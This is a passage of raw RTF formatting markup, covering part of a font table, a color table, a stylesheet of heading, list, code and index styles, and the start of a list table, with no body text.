{\f259\fmodern\fcharset204\fprq1{\*\panose 00000000000000000000}Andale Mono Cyr;}{\f260\fmodern\fcharset161\fprq1{\*\panose 00000000000000000000}Andale Mono Greek;}{\f261\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}Andale Mono Tur;}
{\f262\fmodern\fcharset186\fprq1{\*\panose 00000000000000000000}Andale Mono Baltic;}{\f263\fswiss\fcharset256\fprq2{\*\panose 00000000000000000000}Arial Unicode MS Western;}
{\f264\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Arial Unicode MS CE;}{\f265\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Arial Unicode MS Cyr;}
{\f266\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Arial Unicode MS Greek;}{\f267\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Arial Unicode MS Tur;}
{\f268\fswiss\fcharset177\fprq2{\*\panose 00000000000000000000}Arial Unicode MS (Hebrew);}{\f269\fswiss\fcharset178\fprq2{\*\panose 00000000000000000000}Arial Unicode MS (Arabic);}
{\f270\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Arial Unicode MS Baltic;}{\f271\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Haettenschweiler CE;}
{\f272\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Haettenschweiler Cyr;}{\f273\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Haettenschweiler Greek;}
{\f274\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Haettenschweiler Tur;}{\f275\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Haettenschweiler Baltic;}{\f276\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}HoratioDMed Tur;}
{\f277\fmodern\fcharset256\fprq1{\*\panose 00000000000000000000}@MS Mincho Western;}{\f278\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}@MS Mincho CE;}{\f279\fmodern\fcharset204\fprq1{\*\panose 00000000000000000000}@MS Mincho Cyr;}
{\f280\fmodern\fcharset161\fprq1{\*\panose 00000000000000000000}@MS Mincho Greek;}{\f281\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}@MS Mincho Tur;}{\f282\fmodern\fcharset186\fprq1{\*\panose 00000000000000000000}@MS Mincho Baltic;}
{\f283\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}@SimSun Western;}{\f284\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}Charcoal;}{\f285\fnil\fcharset256\fprq2{\*\panose 03020702040506060504}Apple Chancery;}
{\f286\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Aristocrat LET;}{\f287\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bertram LET;}{\f288\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Bickley Script LET;}
{\f289\fnil\fcharset256\fprq2{\*\panose 00000500000000000000}BlairMdITC TT-Medium;}{\f290\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bodoni Ornaments ITC TT;}
{\f291\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}Bodoni SvtyTwo ITC TT-Bold;}{\f292\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bodoni SvtyTwo ITC TT-Book;}
{\f293\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bodoni SvtyTwo ITC TT-BookIta;}{\f294\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}Bodoni SvtyTwo OS ITC TT-Bold;}
{\f295\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bodoni SvtyTwo OS ITC TT-Book;}{\f296\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bodoni SvtyTwo OS ITC TT-BookIt;}
{\f297\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Bordeaux Roman Bold LET;}{\f298\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}Bradley Hand ITC TT-Bold;}{\f299\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Capitals;}
{\f300\fnil\fcharset256\fprq2{\*\panose 020b0806080604040204}Chicago;}{\f301\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}Gadget;}{\f302\fnil\fcharset256\fprq2{\*\panose 02030602050506020203}Hoefler Text;}
{\f303\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}Hoefler Text Ornaments;}{\f304\fnil\fcharset256\fprq2{\*\panose 00000300000000000000}Humana Serif ITC TT-Light;}
{\f305\fnil\fcharset256\fprq2{\*\panose 00000300000000000000}Humana Serif ITC TT-LightIta;}{\f306\fnil\fcharset256\fprq2{\*\panose 00000500000000000000}Humana Serif ITC TT-MedIta;}
{\f307\fnil\fcharset256\fprq2{\*\panose 00000500000000000000}Humana Serif ITC TT-Medium;}{\f308\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Jokerman LET;}{\f309\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}LunaITC TT-Bold;}
{\f310\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Machine ITC TT;}{\f311\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Mona Lisa Solid ITC TT;}{\f312\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Monaco;}
{\f313\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Palatino;}{\f314\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Party LET;}{\f315\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}PortagoITC TT;}
{\f316\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}Sand;}{\f317\fnil\fcharset256\fprq2{\*\panose 020d0502020204020204}Skia;}{\f318\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}Stone Sans ITC TT-Bold;}
{\f319\fnil\fcharset256\fprq2{\*\panose 00000600000000000000}Stone Sans ITC TT-Semi;}{\f320\fnil\fcharset256\fprq2{\*\panose 00000600000000000000}Stone Sans ITC TT-SemiIta;}
{\f321\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}Stone Sans OS ITC TT-Bold;}{\f322\fnil\fcharset256\fprq2{\*\panose 00000600000000000000}Stone Sans OS ITC TT-Semi;}
{\f323\fnil\fcharset256\fprq2{\*\panose 00000600000000000000}Stone Sans OS ITCTT-SemiIta;}{\f324\fnil\fcharset256\fprq2{\*\panose 00000600000000000000}Stone Sans SC ITC TT-Semi;}{\f325\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}Techno;}
{\f326\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Textile;}{\f327\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}TremorITC TT;}{\f328\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Wanted LET;}{\f329\fnil\fcharset256\fprq2 VT100;}
}}}{\colortbl;\red0\green0\blue0;\red0\green0\blue255;\red0\green255\blue255;\red0\green255\blue0;\red255\green0\blue255;\red255\green0\blue0;\red255\green255\blue0;\red255\green255\blue255;\red0\green0\blue128;\red0\green128\blue128;\red0\green128\blue0;
\red128\green0\blue128;\red128\green0\blue0;\red128\green128\blue0;\red128\green128\blue128;\red192\green192\blue192;}{\stylesheet{\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \snext0 Normal;}{\s1\sb240\sa240\keepn\nowidctlpar\outlinelevel0\adjustright
\b\caps\f1\fs32\cgrid \sbasedon0 \snext0 heading 1;}{\s2\sb240\sa240\keepn\nowidctlpar\outlinelevel1\adjustright \b\f1\fs32\cgrid \sbasedon0 \snext0 heading 2;}{\s3\sb240\sa240\keepn\nowidctlpar\outlinelevel2\adjustright \b\f1\fs28\cgrid
\sbasedon0 \snext15 heading 3;}{\s4\sb240\sa240\keepn\nowidctlpar\outlinelevel3\adjustright \b\i\f1\cgrid \sbasedon0 \snext0 heading 4;}{\s5\sb40\sa240\sl-240\slmult0\keepn\nowidctlpar\outlinelevel4\adjustright \b\i\f1\fs20\cgrid \sbasedon1 \snext0
heading 5;}{\s6\sb240\sa240\sl-238\slmult0\keepn\nowidctlpar\pvpara\posy0\absh255\dxfrtext130\dfrmtxtx130\dfrmtxty0\outlinelevel5\adjustright \b\caps\f1\fs32\cgrid \sbasedon1 \snext0 heading 6;}{\s7\sa120\keepn\widctlpar\outlinelevel6\adjustright
\b\f1\fs20\cgrid \sbasedon0 \snext0 heading 7;}{\*\cs10 \additive Default Paragraph Font;}{\s15\li288\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 Normal Indent;}{\*\cs16 \additive \fs16\cf2 \sbasedon10 annotation reference;}{
\s17\sa120\nowidctlpar\adjustright \f1\fs20\cf6\cgrid \sbasedon0 \snext17 annotation text;}{\s18\li1296\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid \sbasedon0 \snext18 \sautoupd toc 4;}{\s19\li864\sa40\nowidctlpar
\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid \sbasedon0 \snext19 \sautoupd toc 3;}{\s20\li432\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid \sbasedon21 \snext20 \sautoupd toc 2;}{\s21\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright
\f1\fs20\cgrid \sbasedon0 \snext21 \sautoupd toc 1;}{\s22\sa120\nowidctlpar\tqc\tx4320\tqr\tx8640\adjustright \f1\fs16\cgrid \sbasedon0 \snext22 footer;}{\s23\sa120\nowidctlpar\brdrb\brdrs\brdrw15\brsp20 \tqr\tx9936\adjustright \f1\fs20\cgrid
\sbasedon0 \snext23 header;}{\s24\fi-288\li288\sa120\nowidctlpar\tx288\adjustright \f1\fs20\cgrid \sbasedon0 \snext24 List1-Hang;}{\s25\li288\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext24 List1-Indent;}{
\s26\fi-288\li576\sa120\nowidctlpar\tx576\adjustright \f1\fs20\cgrid \sbasedon0 \snext26 List2-Hang;}{\s27\li576\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext26 List2-Indent;}{\s28\fi-288\li864\sa120\nowidctlpar\tx864\adjustright
\f1\fs20\cgrid \sbasedon0 \snext28 List3-Hang;}{\s29\li864\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext28 List3-Indent;}{\s30\li576\sa120\nowidctlpar\adjustright \b\f2\fs20\cgrid \sbasedon31 \snext24 List1-Code;}{
\s31\li576\sa120\nowidctlpar\adjustright \b\f2\fs20\cgrid \snext0 Normal Code;}{\s32\li1152\sa120\nowidctlpar\adjustright \b\f2\fs20\cgrid \sbasedon31 \snext28 List3-Code;}{\s33\li864\sa120\nowidctlpar\adjustright \b\f2\fs20\cgrid \sbasedon31 \snext26
List2-Code;}{\s34\li432\sa120\nowidctlpar\adjustright \i\f1\fs20\cgrid \sbasedon0 \snext0 Normal Note;}{\s35\li432\sa120\nowidctlpar\adjustright \i\f1\fs20\cgrid \sbasedon34 \snext24 List1-Note;}{\s36\li720\sa120\nowidctlpar\adjustright \i\f1\fs20\cgrid
\sbasedon34 \snext26 List2-Note;}{\s37\li1008\sa120\nowidctlpar\adjustright \i\f1\fs20\cgrid \sbasedon34 \snext28 List3-Note;}{\s38\sb120\sa120\nowidctlpar\tqr\tx9936\pvpg\phmrg\posy878\adjustright \f1\fs20\cgrid \sbasedon23 \snext38 banner2;}{
\s39\qc\sb120\sa120\sl240\slmult0\nowidctlpar\tqr\tx9936\pvpg\phmrg\posy878\dxfrtext187\dfrmtxtx187\dfrmtxty187\adjustright \f1\fs20\cgrid \sbasedon23 \snext39 banner1;}{\s40\fi-864\li864\sa120\nowidctlpar\tx432\tx864\adjustright \f1\fs20\cgrid
\sbasedon0 \snext41 Q&A Question-Hang;}{\s41\fi-432\li864\sa120\nowidctlpar\tx864\adjustright \f1\fs20\cgrid \sbasedon0 \snext40 Q&A Answer-Hang;}{\s42\li864\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext41 Q&A Question-Indent;}{
\s43\sa120\sl-72\slmult0\nowidctlpar\adjustright \v\f1\fs20\cgrid \sbasedon0 \snext43 Fix Headings Bug;}{\s44\li864\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext40 Q&A Answer-Indent;}{\s45\li720\sa120\nowidctlpar\adjustright
\b\f2\fs20\cgrid \sbasedon31 \snext45 Ten1-Code;}{\s46\fi-432\li432\sa120\nowidctlpar\tx432\adjustright \f1\fs20\cgrid \sbasedon0 \snext46 Ten1-Hang;}{\s47\li432\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext47 Ten1-Indent;}{
\s48\li576\sa120\nowidctlpar\adjustright \i\f1\fs20\cgrid \sbasedon34 \snext48 Ten1-Note;}{\s49\li1008\sa120\nowidctlpar\adjustright \b\f2\fs20\cgrid \sbasedon33 \snext49 Ten2-Code;}{\s50\fi-288\li720\sa120\nowidctlpar\tx288\adjustright \f1\fs20\cgrid
\sbasedon46 \snext50 Ten2-Hang;}{\s51\li720\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon47 \snext51 Ten2-Indent;}{\s52\li720\sa120\nowidctlpar\adjustright \i\f1\fs20\cgrid \sbasedon48 \snext52 Ten2-Note;}{
\s53\li1008\sa120\nowidctlpar\adjustright \i\f1\fs20\cgrid \sbasedon0 \snext53 Q&A Answer-Note;}{\s54\li1296\sa120\nowidctlpar\adjustright \b\f2\fs20\cgrid \sbasedon31 \snext54 Q&A Answer-Code;}{\s55\fi-432\li1296\sa120\nowidctlpar\tx1296\adjustright
\f1\fs20\cgrid \sbasedon0 \snext55 Q&A Answer2-Hang;}{\s56\li1008\sa120\nowidctlpar\adjustright \i\f1\fs20\cgrid \sbasedon0 \snext56 Q&A Question-Note;}{\s57\li1296\sa120\nowidctlpar\adjustright \b\f2\fs20\cgrid \sbasedon31 \snext57 Q&A Question-Code;}{
\s58\li1296\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext58 Q&A Answer2-Indent;}{\s59\li1728\sa120\nowidctlpar\adjustright \b\f2\fs20\cgrid \sbasedon31 \snext59 Q&A Answer2-Code;}{\s60\fi-432\li1728\sa120\nowidctlpar\tx1728\adjustright
\f1\fs20\cgrid \sbasedon0 \snext60 Q&A Answer3-Hang;}{\s61\li1440\sa120\nowidctlpar\adjustright \i\f1\fs20\cgrid \sbasedon0 \snext61 Q&A Answer2-Note;}{\s62\li1728\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext62 Q&A Answer3-Indent;}{
\s63\li1872\sa120\nowidctlpar\adjustright \i\f1\fs20\cgrid \sbasedon34 \snext60 Q&A Answer3-Note;}{\s64\li2160\sa120\nowidctlpar\adjustright \b\f2\fs20\cgrid \sbasedon31 \snext64 Q&A Answer3-Code;}{\s65\li432\sa120\nowidctlpar\adjustright
\i\f1\fs20\cgrid \sbasedon0 \snext0 Normal-Note;}{\s66\sa120\nowidctlpar\adjustright \f1\fs10\cgrid \sbasedon0 \snext0 half-line;}{\s67\sa120\nowidctlpar\brdrt\brdrs\brdrw15\brsp20 \adjustright \b\f1\fs14\cf1\cgrid \sbasedon0 \snext67 disclaimer;}{
\s68\sb60\sa60\nowidctlpar\adjustright \b\f1\fs20\cgrid \sbasedon69 \snext68 Control Word;}{\s69\fi-2880\li2880\nowidctlpar\tx720\tx2880\tx7200\adjustright \f1\fs20\cgrid \snext69 TC;}{\s70\li432\sa120\nowidctlpar\adjustright \f2\fs16\cgrid
\sbasedon0 \snext70 Code;}{\s71\sa240\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext71 TableLastRow;}{\s72\li432\sa120\nowidctlpar\adjustright \f2\fs20\cgrid \sbasedon0 \snext72 Syntax;}{\s73\sa120\nowidctlpar\adjustright \b\f1\fs20\cgrid
\sbasedon0 \snext73 TableRow;}{\s74\li1440\sb120\sa60\nowidctlpar\adjustright \f1\fs22\cgrid \sbasedon0 \snext74 Body 3;}{\*\cs75 \additive \b\f1\fs20 \sbasedon10 RTF Keyword;}{\s76\qj\sa120\nowidctlpar\tx864\adjustright \f1\fs20\cgrid \sbasedon0 \snext0
First Paragraph;}{\s77\qj\li360\sa60\nowidctlpar\tx864\adjustright \f1\fs20\cgrid \sbasedon76 \snext77 Definition;}{\s78\fi-200\li200\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 table of authorities;}{\s79\sa120\keepn\nowidctlpar
\brdrb\brdrs\brdrw15\brsp20 \adjustright \shading2000 \f1\fs20\cgrid \sbasedon0 \snext79 TableSubHead;}{\s80\sa120\sl-120\slmult0\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext80 TableSpace;}{\s81\nowidctlpar\adjustright \f1\fs20\cgrid \snext81
Nothing;}{\*\cs82 \additive \fs20 \sbasedon10 Comment;}{\s83\sa240\nowidctlpar\adjustright \f1\fs48\cgrid \snext83 TP;}{\s84\sb240\sa60\nowidctlpar\adjustright \f1\fs22\cgrid \sbasedon0 \snext84 Body 1;}{\*\cs85 \additive \fs20\super \sbasedon10
footnote reference;}{\s86\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext86 footnote text;}{\*\cs87 \additive \fs20 \sbasedon10 page number;}{\s88\sb240\sa60\nowidctlpar\adjustright \b\f1\fs48\cgrid \sbasedon0 \snext88 Title;}{
\s89\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd toc 6;}{\s90\sb120\sa120\nowidctlpar\adjustright \b\f1\fs20\cgrid \sbasedon0 \snext0 caption;}{\s91\sb60\sa120\nowidctlpar\adjustright \cbpat9 \f31\fs20\cgrid
\sbasedon0 \snext91 Document Map;}{\s92\fi-200\li200\sb60\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd index 1;}{\s93\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext93 \sautoupd List Bullet;}{
\s94\li1728\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd toc 5;}{\s95\li1200\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd toc 7;}{\s96\li1400\sb60\sa60\nowidctlpar\adjustright
\f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd toc 8;}{\s97\li1600\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd toc 9;}{\s98\sb240\sl199\slmult1\keepn\nowidctlpar\brdrbtw\brdrs\brdrw15 \adjustright \b\f1\fs20\cgrid
\sbasedon0 \snext98 Table Header;}{\s99\sb60\sa60\nowidctlpar\adjustright \b\f1\fs20\cgrid \sbasedon0 \snext99 my control word;}{\s100\fi-200\li400\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd index 2;}{
\s101\fi-200\li600\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd index 3;}{\s102\fi-200\li800\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd index 4;}{
\s103\fi-200\li1000\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd index 5;}{\s104\fi-200\li1200\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd index 6;}{
\s105\fi-200\li1400\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd index 7;}{\s106\fi-200\li1600\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd index 8;}{
\s107\fi-200\li1800\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd index 9;}{\s108\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext92 index heading;}{\s109\widctlpar\adjustright
\fs20\loch\af2\hich\af2\dbch\f28\cgrid \sbasedon0 \snext109 Plain Text;}{\*\cs110 \additive \ul\cf2 \sbasedon10 Hyperlink;}{\*\cs111 \additive \ul\cf2 \sbasedon10 FollowedHyperlink;}{\s112\widctlpar\jclisttab\tx360\ls9\adjustright
\loch\af0\hich\af0\dbch\f28\cgrid \sbasedon0 \snext112 EnumList;}{\*\cs113 \additive \f1\fs20\cf1 \sbasedon10 emailstyle15;}{\*\cs114 \additive \f1\fs20\cf9 \sbasedon10 RTABOADA;}{\s115\sa120\nowidctlpar\adjustright \f31\fs16\cgrid \sbasedon0 \snext115
Balloon Text;}{\s116\sa120\nowidctlpar\adjustright \b\f1\fs20\cgrid \sbasedon17 \snext17 Comment Subject;}}{\*\listtable{\list\listtemplateid-438671200\listsimple{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext
\'02\'00.;}{\levelnumbers\'01;}\fi-360\li1800\jclisttab\tx1800 }{\listname ;}\listid-132}{\list\listtemplateid1977882010\listsimple{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'00.;}{\levelnumbers\'01;}
\fi-360\li1440\jclisttab\tx1440 }{\listname ;}\listid-131}{\list\listtemplateid196762532\listsimple{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'00.;}{\levelnumbers\'01;}\fi-360\li1080\jclisttab\tx1080
}{\listname ;}\listid-130}{\list\listtemplateid10808288\listsimple{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'00.;}{\levelnumbers\'01;}\fi-360\li720\jclisttab\tx720 }{\listname ;}\listid-129}
{\list\listtemplateid-2012342494\listsimple{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3913 _;}{\levelnumbers;}\f3\fbias0 \fi-360\li1800\jclisttab\tx1800 }{\listname ;}\listid-128}
{\list\listtemplateid1140855682\listsimple{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3913 _;}{\levelnumbers;}\f3\fbias0 \fi-360\li1440\jclisttab\tx1440 }{\listname ;}\listid-127}
{\list\listtemplateid-2080875312\listsimple{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3913 _;}{\levelnumbers;}\f3\fbias0 \fi-360\li1080\jclisttab\tx1080 }{\listname ;}\listid-126}
{\list\listtemplateid-1582808918\listsimple{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3913 _;}{\levelnumbers;}\f3\fbias0 \fi-360\li720\jclisttab\tx720 }{\listname ;}\listid-125}
{\list\listtemplateid674782002\listsimple{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'00.;}{\levelnumbers\'01;}\fi-360\li360\jclisttab\tx360 }{\listname ;}\listid-120}{\list\listtemplateid696671516
\listsimple{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3913 _;}{\levelnumbers;}\f3\fbias0 \fi-360\li360\jclisttab\tx360 }{\listname ;}\listid-119}{\list\listtemplateid1679699710\listsimple
{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat0\levelspace0\levelindent0{\leveltext\'01*;}{\levelnumbers;}}{\listname ;}\listid-2}{\list\listtemplateid-1273221934{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat255\levelspace0
\levelindent0{\leveltext\'01\'00;}{\levelnumbers\'01;}\fbias0 \fi-480\li840\jclisttab\tx840 }{\listlevel\levelnfc4\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'01.;}{\levelnumbers\'01;}\fi-360\li1440\jclisttab\tx1440 }
{\listlevel\levelnfc2\leveljc2\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'02.;}{\levelnumbers\'01;}\fi-180\li2160\jclisttab\tx2160 }{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext
\'02\'03.;}{\levelnumbers\'01;}\fi-360\li2880\jclisttab\tx2880 }{\listlevel\levelnfc4\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'04.;}{\levelnumbers\'01;}\fi-360\li3600\jclisttab\tx3600 }{\listlevel\levelnfc2\leveljc2
\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'05.;}{\levelnumbers\'01;}\fi-180\li4320\jclisttab\tx4320 }{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'06.;}{\levelnumbers\'01;}
\fi-360\li5040\jclisttab\tx5040 }{\listlevel\levelnfc4\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'07.;}{\levelnumbers\'01;}\fi-360\li5760\jclisttab\tx5760 }{\listlevel\levelnfc2\leveljc2\levelfollow0\levelstartat1
\levelspace0\levelindent0{\leveltext\'02\'08.;}{\levelnumbers\'01;}\fi-180\li6480\jclisttab\tx6480 }{\listname ;}\listid205264908}{\list\listtemplateid586976306\listsimple{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat1\levelold\levelspace0
\levelindent360{\leveltext\'02\'00.;}{\levelnumbers\'01;}\fi-360\li360 }{\listname ;}\listid381372897}{\list\listtemplateid1168535394{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat0\levelspace0\levelindent0{\leveltext\'01\'00;}{\levelnumbers
\'01;}\fbias0 \jclisttab\tx360 }{\listlevel\levelnfc4\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'01.;}{\levelnumbers\'01;}\fi-360\li1440\jclisttab\tx1440 }{\listlevel\levelnfc2\leveljc2\levelfollow0\levelstartat1
\levelspace0\levelindent0{\leveltext\'02\'02.;}{\levelnumbers\'01;}\fi-180\li2160\jclisttab\tx2160 }{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'03.;}{\levelnumbers\'01;}\fi-360\li2880
\jclisttab\tx2880 }{\listlevel\levelnfc4\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'04.;}{\levelnumbers\'01;}\fi-360\li3600\jclisttab\tx3600 }{\listlevel\levelnfc2\leveljc2\levelfollow0\levelstartat1\levelspace0
\levelindent0{\leveltext\'02\'05.;}{\levelnumbers\'01;}\fi-180\li4320\jclisttab\tx4320 }{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'06.;}{\levelnumbers\'01;}\fi-360\li5040\jclisttab\tx5040 }
{\listlevel\levelnfc4\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'07.;}{\levelnumbers\'01;}\fi-360\li5760\jclisttab\tx5760 }{\listlevel\levelnfc2\leveljc2\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext
\'02\'08.;}{\levelnumbers\'01;}\fi-180\li6480\jclisttab\tx6480 }{\listname ;}\listid1176193685}{\list\listtemplateid1367258230{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3913 _;}{\levelnumbers;}
\f3\cf0\fbias0 \fi-144\li144\jclisttab\tx360 }{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01o;}{\levelnumbers;}\f2\fbias0 \fi-360\li1440\jclisttab\tx1440 }{\listlevel\levelnfc23\leveljc0\levelfollow0
\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3929 _;}{\levelnumbers;}\f14\fbias0 \fi-360\li2160\jclisttab\tx2160 }{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3913 _;}{\levelnumbers;}
\f3\fbias0 \fi-360\li2880\jclisttab\tx2880 }{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01o;}{\levelnumbers;}\f2\fbias0 \fi-360\li3600\jclisttab\tx3600 }{\listlevel\levelnfc23\leveljc0\levelfollow0
\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3929 _;}{\levelnumbers;}\f14\fbias0 \fi-360\li4320\jclisttab\tx4320 }{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3913 _;}{\levelnumbers;}
\f3\fbias0 \fi-360\li5040\jclisttab\tx5040 }{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01o;}{\levelnumbers;}\f2\fbias0 \fi-360\li5760\jclisttab\tx5760 }{\listlevel\levelnfc23\leveljc0\levelfollow0
\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3929 _;}{\levelnumbers;}\f14\fbias0 \fi-360\li6480\jclisttab\tx6480 }{\listname ;}\listid1914731812}{\list\listtemplateid67698689\listsimple{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1
\levelspace0\levelindent0{\leveltext\'01\u-3913 _;}{\levelnumbers;}\f3\fbias0 \fi-360\li360\jclisttab\tx360 }{\listname ;}\listid2136293396}}{\*\listoverridetable{\listoverride\listid-119\listoverridecount0\ls1}{\listoverride\listid-2
